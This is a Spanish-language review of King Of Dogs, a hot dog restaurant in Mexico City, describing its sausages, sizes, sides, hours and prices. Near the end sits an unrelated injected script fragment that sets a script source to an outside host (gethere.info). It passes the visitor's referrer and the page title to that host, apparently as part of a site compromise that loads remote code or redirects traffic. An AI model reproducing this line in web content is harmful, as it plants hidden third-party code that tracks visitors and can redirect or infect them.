¿Amante de los hot dogs? Ven a King Of Dogs

 

Una experiencia nueva y muy accesible.

¿Eres amantes de los Hot dogs?  Deberías de venir a King Of Dogs para degustar de una deliciosa salchicha, acompañado de tus amigos o de tu pareja.

King of dogs es un restaurante que se especializa en los jochos y tiene muchas combinaciones perfectas para cualquier gusto. El lugar se encuentra en Insurgentes  Sur 1937 en la Col. Guadalupe Inn,  muy cerca de la plaza Inn.

Estamos hablando de un lugar pequeño pero acogedor, en donde podrás asistir con varias personas o solo un acompañante. Lo divertido de este lugar es que los Hot-Dogs varían en tamaños y en sabores radicalmente. El hot dog normal es de 20 cm y el grande, mayor a 40cm, no para alguien que coma poco. Las salchichas de este establecimiento varían demasiado, en donde la puedes pedir de pavo, de res, de cerdo y una especial que sin duda mejorara el sabor de tu comida, una salchicha alemana, ya saben que eso se les da a los alemanes.

King of Dogs se encuentra abierto todos los  días de la semana, lunes a viernes de 11:00 am a 21:00 pm y los fines de semana abren a las 13:00 horas.

Hot-Dogs no es lo único que puedes pedir, también hay muchas guarniciones para acompañar o mejorar tu comida, desde papas a la francesa hasta ensaladas y algunos paninis. Todo esto se vuelve una mejor experiencia si acompañamos nuestro jocho con una cervecita a un excelente precio, hablamos de comer por menos de $150 pesos, y no solo comer y ya, quedar bastante satisfecho.

 

Algunas de las opciones tienen el pan de diferente sabor, desde cheddar hasta un pan con ajonjolí o parmesano con ajo. Los hot-dogs varían en sus ingredientes, tenemos uno con chili, un con guacamole y chicharrón, otro con tocino, otro con cebolla caramelizada, clásicos, entre otros.

Así que si lo tuyo son los jochos, y no has encontrado la casa de los Hot-Dogs, aquí te la presentamos, sin duda un buen lugar para ir este fin de semana y degustar una de estas delicias.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios